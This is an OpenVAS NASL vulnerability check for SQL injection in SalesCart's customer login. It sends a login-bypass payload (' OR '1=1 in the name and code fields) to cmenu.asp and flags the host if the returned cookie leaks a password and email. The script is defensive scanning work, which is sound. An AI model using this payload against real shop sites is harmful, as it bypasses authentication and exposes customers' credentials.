###############################################################################
# OpenVAS Vulnerability Test
# $Id: SalesCart_login_multiple_sql_injection.nasl 132 2009-03-15 19:09:30Z mime $
#
# SalesCart Login Multiple SQL Injection Vulnerabilities
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Michael Meyer
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
 script_id(100053);
 script_bugtraq_id(33534);
 script_version ("1.0");

 script_name(english:"SalesCart Login Multiple SQL Injection Vulnerabilities");
 desc["english"] = "

 Overview:
  SalesCart is prone to multiple SQL-injection vulnerabilities because
  it fails to sufficiently sanitize user-supplied data before using it
  in an SQL query.

  Exploiting this issue could allow an attacker to compromise the
  application, access or modify data, or exploit latent
  vulnerabilities in the underlying database. 

 See also:
  http://www.securityfocus.com/bid/33534

 Risk factor : Medium";

 script_description(english:desc["english"]);
 script_summary(english:"Determine if SalesCart is vulnerable to SQL Injection");
 script_category(ACT_GATHER_INFO);
 script_family(english:"Web application abuses");
 script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
 script_dependencie("find_service.nes", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);
if(!get_port_state(port))exit(0);
if(!can_host_asp(port:port))exit(0);

dirs = make_list(cgi_dirs());
foreach dir (dirs) {

    url = string(dir, "/online/customer/customer_login.asp");
    req = http_get(item:url, port:port);
    buf = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if( buf == NULL )continue;

    if(  
        egrep(pattern: ".*Customer Control Panel.*", string: buf) ||
	egrep(pattern: ".*Order Management System, Ver [0-9}+\.[0-9]*.*", string: buf) )
    {
	    variables = string("name=%27+OR+%271%3D1&code=%27+OR+%271%3D1&Login=Login&Remember=ON");
	    filename = string(dir + "/online/customer/cmenu.asp");
	    host=get_host_name();

	    req = string(
	      "POST ", filename, " HTTP/1.0\r\n", 
	      "Referer: ","http://", host, filename, "\r\n",
	      "Host: ", host, ":", port, "\r\n", 
	      "Content-Type: application/x-www-form-urlencoded\r\n", 
	      "Content-Length: ", strlen(variables), 
	      "\r\n\r\n", 
	      variables
	    );

	    result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
	    if( result == NULL )continue;

	    if( egrep(pattern: "^Set-Cookie: SalesCart.*rememberme=ON&password=.*&email=.*", string: result) )
	    {
	         security_warning(port);
	         exit(0);
	    }
    }
}

exit(0);
